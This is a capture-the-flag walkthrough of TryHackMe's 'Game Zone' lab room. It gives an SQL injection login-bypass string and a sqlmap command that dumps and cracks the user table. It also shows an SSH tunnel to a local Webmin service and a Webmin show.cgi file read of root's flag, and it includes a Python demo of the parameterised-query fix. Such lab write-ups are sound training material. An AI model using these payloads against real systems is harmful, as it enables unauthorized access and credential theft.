A room in TryHackMe’s OSCP path. Make sure to check out TryHackMe!
Game Zone Writeup
[Task 1] Deploy the vulnerable machine
Deploy the machine, then open its IP address in your web browser to see the Game Zone forum. The picture in the background is Agent 47 from the Hitman series. If you didn't know that off the top of your head, you could try a reverse image search on the picture.
Question: What is the name of the large cartoon avatar holding a sniper on the forum?
Answer: Agent 47
[Task 2] Gain Access
For this task, you need to exploit the login field using SQLi (SQL injection). Enter ' or 1=1 -- - as the username and leave the password blank to bypass the login form. You'll be redirected to
Question: When you’ve logged in, what page do you get redirected to?
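To see why that username string bypasses the check, here is an added example (not from the room or this writeup) that runs the same payload against a login query built by string concatenation and against a parameterised one, using an in-memory SQLite table with constructed sample users:

```python
import hashlib
import sqlite3

# Constructed sample users standing in for the forum's users table
# (throwaway data, not the room's real accounts).
SAMPLE_USERS = [("agent47", "example-password"), ("diana", "another-example")]

# The exact username payload from the writeup; the password is left blank.
BYPASS_USERNAME = "' or 1=1 -- -"


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(u, sha256_hex(p)) for u, p in SAMPLE_USERS])
    return conn


def login_vulnerable(conn, username: str, password: str):
    # Username spliced straight into the SQL string. With the payload the
    # WHERE clause becomes:  username = '' or 1=1 -- -' AND pwd = '<hash>'
    # Everything after -- is a comment, so the query matches every row and
    # the first user comes back as "logged in".
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND pwd = '" + sha256_hex(password) + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, username: str, password: str):
    # Parameterised query: the payload is bound as a literal string value
    # and never reaches the SQL parser as syntax, so nothing matches.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, sha256_hex(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", login_vulnerable(db, BYPASS_USERNAME, ""))  # agent47
    print("hardened:  ", login_hardened(db, BYPASS_USERNAME, ""))  # None
```

The same contrast applies to the searchitem field on portal.php later in the room: any value that reaches the query as text rather than as a bound parameter is injectable.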
[Task 3] Using SQLMap
Now we will use SQLMap to exfiltrate data from the Game Zone portal. The room suggests using Burp Suite, but it can be faster to skip that tool.
We want to use SQLMap to brute-force SQL injection on portal.php, but to access this file you need to be logged in. Since you are already logged in, grab your PHPSESSID cookie (either from browser info or
Now that we know the cookie, we need to know which field to try SQL injection on. Open the source of the page and you'll see <input type="text" id="searchitem" name="searchitem">. This means there is a form field named searchitem which can be tested for SQLi.
Run the command sqlmap -u "http://<IP>/portal.php" --cookie="PHPSESSID=<COOKIE>" --data="searchitem=" --dump to scan for SQLi on portal.php, using your cookie, on the searchitem field. It will also attempt to dump the whole database to a file. Run this command, and when it asks if you want to crack the passwords, hit yes and point it to a password wordlist (like
Let it run, and when it's done you'll have a dump of the database and the login for a user! Check out the directory where SQLMap wrote all of its data. It should be at ~/.sqlmap/output/<IP>. Here, if you check out the log file, you'll find the other table name.
Question: In the users table, what is the hashed password?
Question: What was the username associated with the hashed password?
Question: What was the other table name?
[Task 4] Cracking a password with JohnTheRipper
Well, if you did what I did last task, you don't need to use JohnTheRipper. You already know the password, so use it to SSH into the box and read the user flag.
Question: What is the de-hashed password?
Question: What is the user flag?
[Task 5] Exposing services with reverse SSH tunnels
Run ss -tulpn to see all of the listening sockets, and you'll see there are 5 TCP sockets running. One of them is listening on port 10000, and we can check what it is using curl localhost:10000 on the gamezone box: it's a website! However, navigating to <IP>:10000 in your browser doesn't work, which means the service is not accepting outside connections to that port (it is only reachable from the box itself).
We can get around this with an SSH tunnel. Run the command ssh -L 10000:localhost:10000 <USERNAME>@<gamezone_ip> on your box (<USERNAME> is the account you recovered from the database dump). This forwards port 10000 on your own machine through the SSH session to port 10000 on the target's loopback interface, so the service that only listens locally on the box becomes reachable at localhost:10000 on your box. Now, if you open localhost:10000 in your browser, a login form should appear! It asks for a username and password, so plug in the login details you already know.
Question: How many TCP sockets are running?
Answer: 5
Question: What is the name of the exposed CMS?
Answer: Webmin
Question: What is the CMS version?
[Task 6] Privilege Escalation with Metasploit
Rather than using Metasploit directly, let's see if we can use it to figure out how to exploit the box. Running msfconsole and then search webmin brings up many exploits. exploit/unix/webapp/webmin_show_cgi_exec seemed interesting to me, so I searched for it and found this link on GitHub. Looking through the code, I see a reference to /file/show.cgi/ with a file path placed right after it. It seems to be a script that will read out the contents of any file, so let's use it to get the flag. Navigating to localhost:10000/file/show.cgi/root/root.txt prints out the flag, all without using Metasploit.
Question: What is the root flag?